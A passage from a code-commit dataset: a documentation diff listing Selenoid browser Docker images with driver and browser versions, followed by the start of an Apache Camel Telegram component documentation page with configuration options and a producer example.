or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.7 | 0.16.0 | 53.0 (switching windows may not work) .4+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.7 | 0.17.0 | 54.0 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.7 | 0.18.0 | 55.0.1 (switching windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.7 | 0.19.0 | 56.0 \n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | 
selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. If you have such packages, we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to a bug in *Operadriver*, to work with *Opera Blink* images you need to pass an additional capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. Many basic operations, like working with proxies, may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. 
If you have such packages - we could create more images.\n====\n\n","old_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| selenoid\/firefox:19.0 | selenoid\/vnc:firefox_19.0 | 2.32.0 | 19.0.2\n| selenoid\/firefox:20.0 | selenoid\/vnc:firefox_20.0 | 2.32.0 | 20.0\n| selenoid\/firefox:21.0 | selenoid\/vnc:firefox_21.0 | 2.32.0 | 21.0\n| selenoid\/firefox:22.0 | selenoid\/vnc:firefox_22.0 | 2.32.0 | 22.0\n| selenoid\/firefox:23.0 | selenoid\/vnc:firefox_23.0 | 2.35.0 | 23.0.1 .30+<.^| Any modern client version\n| selenoid\/firefox:24.0 | selenoid\/vnc:firefox_24.0 | 2.39.0 | 24.0\n| selenoid\/firefox:25.0 | selenoid\/vnc:firefox_25.0 | 2.39.0 | 25.0.1\n| selenoid\/firefox:26.0 | selenoid\/vnc:firefox_26.0 | 2.39.0 | 26.0\n| selenoid\/firefox:27.0 | selenoid\/vnc:firefox_27.0 | 2.40.0 | 27.0.1\n| selenoid\/firefox:28.0 | selenoid\/vnc:firefox_28.0 | 2.41.0 | 28.0\n| selenoid\/firefox:29.0 | selenoid\/vnc:firefox_29.0 | 2.43.1 | 29.0.1\n| selenoid\/firefox:30.0 | selenoid\/vnc:firefox_30.0 | 2.43.1 | 30.0 \n| selenoid\/firefox:31.0 | selenoid\/vnc:firefox_31.0 | 2.44.0 | 31.0 \n| selenoid\/firefox:32.0 | selenoid\/vnc:firefox_32.0 | 2.44.0 | 32.0.3 \n| selenoid\/firefox:33.0 | selenoid\/vnc:firefox_33.0 | 2.44.0 | 33.0.3 \n| selenoid\/firefox:34.0 | selenoid\/vnc:firefox_34.0 | 2.45.0 | 34.0.5 \n| selenoid\/firefox:35.0 | selenoid\/vnc:firefox_35.0 | 2.45.0 | 35.0.1 \n| selenoid\/firefox:36.0 | selenoid\/vnc:firefox_36.0 | 2.45.0 | 36.0.1 \n| selenoid\/firefox:37.0 | selenoid\/vnc:firefox_37.0 | 2.45.0 | 37.0.2 \n| selenoid\/firefox:38.0 | selenoid\/vnc:firefox_38.0 | 2.45.0 | 38.0.5 \n| selenoid\/firefox:39.0 | selenoid\/vnc:firefox_39.0 | 2.45.0 | 39.0.3 \n| selenoid\/firefox:40.0 | selenoid\/vnc:firefox_40.0 | 2.45.0 | 40.0.3 \n| selenoid\/firefox:41.0 | selenoid\/vnc:firefox_41.0 | 2.45.0 | 41.0.2 \n| selenoid\/firefox:42.0 | selenoid\/vnc:firefox_42.0 | 2.47.1 | 42.0 \n| selenoid\/firefox:43.0 | selenoid\/vnc:firefox_43.0 | 2.53.1 | 43.0.4 \n| selenoid\/firefox:44.0 | 
selenoid\/vnc:firefox_44.0 | 2.53.1 | 44.0.2 \n| selenoid\/firefox:45.0 | selenoid\/vnc:firefox_45.0 | 2.53.1 | 45.0.2 \n| selenoid\/firefox:46.0 | selenoid\/vnc:firefox_46.0 | 2.53.1 | 46.0.1 \n| selenoid\/firefox:47.0 | selenoid\/vnc:firefox_47.0 | 2.53.1 | 47.0.1 \n| selenoid\/firefox:48.0 | selenoid\/vnc:firefox_48.0 | 3.2.0 + GD 0.13.0 | 48.0.2 (native events and proxies don't work) \n| selenoid\/firefox:49.0 | selenoid\/vnc:firefox_49.0 | 3.2.0 + GD 0.13.0 | 49.0.2 (native events and switching between windows don't work) \n| selenoid\/firefox:50.0 | selenoid\/vnc:firefox_50.0 | 3.2.0 + GD 0.13.0 | 50.0.2 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:51.0 | selenoid\/vnc:firefox_51.0 | 3.2.0 + GD 0.14.0 | 51.0.1 (native events, switching windows and proxies don't work) \n| selenoid\/firefox:52.0 | selenoid\/vnc:firefox_52.0 | 3.3.1 + GD 0.15.0 | 52.0.2 (native events, switching windows don't work; proxy capability format could change) \n|===\n\nWARNING: Firefox images below require Selenium client 3.4.0 or newer.\n\n.Firefox Images with Selenoid\n|===\n| Image | VNC Image | Selenoid Version | Geckodriver Version | Firefox Version | Client Version\n\n| selenoid\/firefox:53.0 | selenoid\/vnc:firefox_53.0 | 1.3.6 | 0.16.0 | 53.0 (switching windows may not work) .4+<.^|\n**Java, selenium-webdriver.js**: 3.4.0 and above\n**Python**: 3.5.0 and above\n| selenoid\/firefox:54.0 | selenoid\/vnc:firefox_54.0 | 1.3.6 | 0.17.0 | 54.0 (switching windows may not work) \n| selenoid\/firefox:55.0 | selenoid\/vnc:firefox_55.0 | 1.3.6 | 0.18.0 | 55.0.1 (switching windows may not work) \n| selenoid\/firefox:56.0 | selenoid\/vnc:firefox_56.0 | 1.3.7 | 0.19.0 | 56.0 \n|===\n\n\n=== Chrome\n\n.Chrome Images\n|===\n| Image | VNC Image | Chromedriver version | Chrome version\n\n| selenoid\/chrome:48.0 | selenoid\/vnc:chrome_48.0 | 2.21 | 48.0.2564.116 \n| selenoid\/chrome:49.0 | selenoid\/vnc:chrome_49.0 | 2.22 | 49.0.2623.112 \n| selenoid\/chrome:50.0 | selenoid\/vnc:chrome_50.0 | 2.22 | 50.0.2661.102 \n| selenoid\/chrome:51.0 | selenoid\/vnc:chrome_51.0 | 2.23 | 51.0.2704.106 \n| selenoid\/chrome:52.0 | selenoid\/vnc:chrome_52.0 | 2.24 | 52.0.2743.116 \n| selenoid\/chrome:53.0 | selenoid\/vnc:chrome_53.0 | 2.26 | 53.0.2785.143 \n| selenoid\/chrome:54.0 | selenoid\/vnc:chrome_54.0 | 2.27 | 54.0.2840.100 \n| selenoid\/chrome:55.0 | selenoid\/vnc:chrome_55.0 | 2.28 | 55.0.2883.87 \n| selenoid\/chrome:56.0 | selenoid\/vnc:chrome_56.0 | 2.29 | 56.0.2924.87 \n| selenoid\/chrome:57.0 | selenoid\/vnc:chrome_57.0 | 2.29 | 57.0.2987.110 \n| selenoid\/chrome:58.0 | selenoid\/vnc:chrome_58.0 | 2.29 | 58.0.3029.81 \n| selenoid\/chrome:59.0 | selenoid\/vnc:chrome_59.0 | 2.30 | 59.0.3071.86 \n| selenoid\/chrome:60.0 | selenoid\/vnc:chrome_60.0 | 2.31 | 60.0.3112.90\n| selenoid\/chrome:61.0 | selenoid\/vnc:chrome_61.0 | 2.32 | 61.0.3163.79\n| selenoid\/chrome:62.0 | selenoid\/vnc:chrome_62.0 | 2.33 | 62.0.3202.62\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Chrome versions were not built because we have no Debian packages. 
If you have such packages - we could create more images.\n====\n\n=== Opera\n\n.Opera Presto Images\n|===\n| Image | VNC Image | Selenium version | Opera version\n\n| selenoid\/opera:12.16 | selenoid\/vnc:opera_12.16 | 2.37.0 | 12.16.1860 (dialogs and probably async JS don't work)\n|===\n\n[WARNING]\n====\nDue to bug in *Operadriver* to work with *Opera Blink* images you need to pass additional capability:\n[source,javascript]\n{\"browserName\": \"opera\", \"operaOptions\": {\"binary\": \"\/usr\/bin\/opera\"}}\n\nWe do not consider these images really stable. Many of base operations like working with proxies may not work.\n====\n\n.Opera Blink Images\n|===\n| Image | VNC Image | Operadriver version | Opera version\n\n| selenoid\/opera:33.0 | selenoid\/vnc:opera_33.0 | 0.2.2 | 33.0.1990.115 \n| selenoid\/opera:34.0 | selenoid\/vnc:opera_34.0 | 0.2.2 | 34.0.2036.50 \n| selenoid\/opera:35.0 | selenoid\/vnc:opera_35.0 | 0.2.2 | 35.0.2066.92 \n| selenoid\/opera:36.0 | selenoid\/vnc:opera_36.0 | 0.2.2 | 36.0.2130.65 \n| selenoid\/opera:37.0 | selenoid\/vnc:opera_37.0 | 0.2.2 | 37.0.2178.54 \n| selenoid\/opera:38.0 | selenoid\/vnc:opera_38.0 | 0.2.2 | 38.0.2220.41 \n| selenoid\/opera:39.0 | selenoid\/vnc:opera_39.0 | 0.2.2 | 39.0.2256.71 \n| selenoid\/opera:40.0 | selenoid\/vnc:opera_40.0 | 0.2.2 | 40.0.2308.90 \n| selenoid\/opera:41.0 | selenoid\/vnc:opera_41.0 | 2.27 | 41.0.2353.69 \n| selenoid\/opera:42.0 | selenoid\/vnc:opera_42.0 | 2.27 | 42.0.2393.94 \n| selenoid\/opera:43.0 | selenoid\/vnc:opera_43.0 | 2.27 | 43.0.2442.991 \n| selenoid\/opera:44.0 | selenoid\/vnc:opera_44.0 | 2.27 | 44.0.2510.857\n| selenoid\/opera:45.0 | selenoid\/vnc:opera_45.0 | 2.27 | 45.0.2552.635\n| selenoid\/opera:46.0 | selenoid\/vnc:opera_46.0 | 2.27 | 46.0.2597.26\n| selenoid\/opera:47.0 | selenoid\/vnc:opera_47.0 | 2.29 | 47.0.2631.39\n| selenoid\/opera:48.0 | selenoid\/vnc:opera_48.0 | 2.30 | 48.0.2685.35\n|===\n\n[NOTE]\n====\n. These images work with any modern Selenium client version.\n. Images for older Opera versions were not built because we have no Debian packages. 
If you have such packages - we could create more images.\n====\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"82128c14ae875b70a9a21392ca82aea758eb86cd","subject":"Regen","message":"Regen\n","repos":"christophd\/camel,mcollovati\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,CodeSmell\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,alvinkwekel\/camel,christophd\/camel,zregvart\/camel,pax95\/camel,christophd\/camel,nikhilvibhav\/camel,CodeSmell\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,gnodet\/camel,pmoerenhout\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,alvinkwekel\/camel,cunningt\/camel,mcollovati\/camel,zregvart\/camel,gnodet\/camel,ullgren\/camel,nicolaferraro\/camel,adessaigne\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,DariusX\/camel,apache\/camel,nikhilvibhav\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,nikhilvibhav\/camel,adessaigne\/camel,adessaigne\/camel,apache\/camel,ullgren\/camel,DariusX\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,CodeSmell\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,nicolaferraro\/camel,zregvart\/camel,tadayosi\/camel,ullgren\/camel,CodeSmell\/camel,adessaigne\/camel,adessaigne\/camel,pax95\/camel,pmoerenhout\/camel,gnodet\/camel,pmoerenhout\/camel,apache\/camel,DariusX\/camel,cunningt\/camel,ullgren\/camel,zregvart\/camel,tadayosi\/camel,tadayosi\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/telegram-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/telegram-component.adoc","new_contents":"[[telegram-component]]\n= Telegram Component\n:page-source: components\/camel-telegram\/src\/main\/docs\/telegram-component.adoc\n\n*Since Camel 2.18*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe Telegram component provides access to the https:\/\/core.telegram.org\/bots\/api[Telegram Bot API].\nIt allows a Camel-based application to send and receive messages by acting as a Bot, participating in\ndirect conversations with normal users, private and public groups or channels.\n\nA Telegram Bot must be created before using this component, following the instructions at the\nhttps:\/\/core.telegram.org\/bots#3-how-do-i-create-a-bot[Telegram Bot developers home].\nWhen a new Bot is created, the https:\/\/telegram.me\/botfather[BotFather] provides an\n**authorization token** corresponding to the Bot. 
The authorization token is a mandatory parameter\nfor the camel-telegram endpoint.\n\nNOTE: In order to allow the Bot to receive all messages exchanged within a group or channel (not just\nthe ones starting with a '\/' character), ask the BotFather to *disable the privacy mode*, using the\n*\/setprivacy* command.\n\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-telegram<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,text]\n----------------------------------------------------\ntelegram:type\/authorizationToken[?options]\n----------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\/\/ component options: START\nThe Telegram component supports 7 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *authorizationToken* (security) | The default Telegram authorization token to be used when the information is not provided in the endpoints. | | String\n| *client* (advanced) | To use a custom AsyncHttpClient | | AsyncHttpClient\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. | | AsyncHttpClientConfig\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | https:\/\/api.telegram.org | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\/\/ endpoint options: START\nThe Telegram endpoint is configured using URI syntax:\n\n----\ntelegram:type\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *type* | *Required* The endpoint type. Currently, only the 'bots' type is supported. 
| | String\n|===\n\n\n=== Query Parameters (31 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *limit* (consumer) | Limit on the number of updates that can be received in a single polling request. | 100 | Integer\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *timeout* (consumer) | Timeout in seconds for long polling. Put 0 for short polling or a bigger number for long polling. Long polling produces shorter response time. | 30 | Integer\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *chatId* (producer) | The identifier of the chat that will receive the produced messages. Chat ids can be first obtained from incoming messages (eg. when a telegram user starts a conversation with a bot, its client sends automatically a '\/start' message containing the chat id). It is an optional parameter, as the chat id can be set dynamically for each outgoing message (using body or headers). | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *bufferSize* (advanced) | The initial in-memory buffer size used when transferring data between Camel and AHC Client. | 4096 | int\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. 
| | AsyncHttpClientConfig\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *proxyHost* (proxy) | HTTP proxy host which could be used when sending out the message. | | String\n| *proxyPort* (proxy) | HTTP proxy port which could be used when sending out the message. 
| | Integer\n| *authorizationToken* (security) | *Required* The authorization token for using the bot (ask the BotFather) | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-telegram-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.telegram.authorization-token* | The default Telegram authorization token to be used when the information is not provided in the endpoints. | | String\n| *camel.component.telegram.base-uri* | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *camel.component.telegram.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.telegram.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.telegram.client* | To use a custom AsyncHttpClient. The option is a org.asynchttpclient.AsyncHttpClient type. | | String\n| *camel.component.telegram.client-config* | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. The option is a org.asynchttpclient.AsyncHttpClientConfig type. | | String\n| *camel.component.telegram.enabled* | Whether to enable auto configuration of the telegram component. This is enabled by default. | | Boolean\n| *camel.component.telegram.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"20%,80%\",options=\"header\",]\n|=======================================================================\n|Name |Description\n|`CamelTelegramChatId` |This header is used by the producer endpoint in order to\nresolve the chat id that will receive the message. 
The recipient chat id can be\nplaced (in order of priority) in the message body, in the `CamelTelegramChatId` header,\nor in the endpoint configuration (`chatId` option).\nThis header is also present in all incoming messages.\n\n|`CamelTelegramMediaType` |This header is used to identify the media type when\nthe outgoing message is composed of pure binary data. Possible values are strings or enum values\nbelonging to the `org.apache.camel.component.telegram.TelegramMediaType` enumeration.\n\n|`CamelTelegramMediaTitleCaption` |This header is used to provide a caption or title\nfor outgoing binary messages.\n\n|`CamelTelegramParseMode` |This header is used to format text messages using HTML or Markdown (see `org.apache.camel.component.telegram.TelegramParseMode`).\n\n|=======================================================================\n\n== Usage\n\nThe Telegram component supports both consumer and producer endpoints.\nIt can also be used in *reactive chat-bot mode* (to consume, then produce messages).\n\n== Producer Example\n\nThe following is a basic example of how to send a message to a Telegram chat through the\nTelegram Bot API.\n\nIn Java DSL:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"direct:start\").to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML:\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"direct:start\"\/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<\/route>\n---------------------------------------------\n\nThe code `123456789:insertYourAuthorizationTokenHere` is the *authorization token* corresponding to the Bot.\n\nWhen using the producer endpoint without specifying the *chat id* option, the target chat will be identified using information contained in the body or headers of the message.\nThe following message bodies are allowed for a producer endpoint (messages of type `OutgoingXXXMessage` belong to the package `org.apache.camel.component.telegram.model`):\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `OutgoingTextMessage` | To send a text message to a chat\n| `OutgoingPhotoMessage` | To send a photo (JPG, PNG) to a chat\n| 